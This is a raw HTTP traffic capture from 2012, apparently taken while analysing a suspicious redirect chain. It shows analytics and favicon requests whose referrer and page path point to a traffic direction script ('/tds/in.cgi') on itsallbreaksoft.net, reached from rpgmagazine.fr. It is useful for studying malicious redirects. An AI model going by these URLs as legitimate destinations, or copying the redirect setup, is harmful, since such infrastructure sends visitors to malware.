GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=958985898&utmhn=itsallbreaksoft.net&utmcs=UTF-8&utmsr=1176x885&utmvp=1x1&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Itsallbreaksoft.net&utmhid=1112349664&utmr=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&utmp=%2Ftds%2Fin.cgi%3F3%26seoref%3D%26parameter%3D%24keyword%26se%3D%24se%26ur%3D1%26HTTP_REFERER%3Dhttp%25253A%25252F%25252Fwww.rpgmagazine.fr%25252Fsite%25252F%25253Fp%25253D156%26default_keyword%3Dnotdefine&utmac=UA-2249740-15&utmcc=__utma%3D150301038.653330257.1352202638.1352202638.1352202638.1%3B%2B__utmz%3D150301038.1352202638.1.1.utmcsr%3Drpgmagazine.fr%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fsite%2F%3B&utmu=H~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=958985898&amp;utmhn=itsallbreaksoft.net&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1x1&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Itsallbreaksoft.net&amp;utmhid=1112349664&amp;utmr=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;utmp=%2Ftds%2Fin.cgi%3F3%26seoref%3D%26parameter%3D%24keyword%26se%3D%24se%26ur%3D1%26HTTP_REFERER%3Dhttp%25253A%25252F%25252Fwww.rpgmagazine.fr%25252Fsite%25252F%25253Fp%25253D156%26default_keyword%3Dnotdefine&amp;utmac=UA-2249740-15&amp;utmcc=__utma%3D150301038.653330257.1352202638.1352202638.1352202638.1%3B%2B__utmz%3D150301038.1352202638.1.1.utmcsr%3Drpgmagazine.fr%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fsite%2F%3B&amp;utmu=H~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:16:19 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 470059
Server: GFE/2.0
GET /favicon.ico HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Tue, 06 Nov 2012 11:50:38 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Fri, 13 Apr 2012 01:41:48 GMT
Etag: &quot;18281ae-838-4bd859364cf00&quot;
Accept-Ranges: bytes
Content-Length: 2104
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive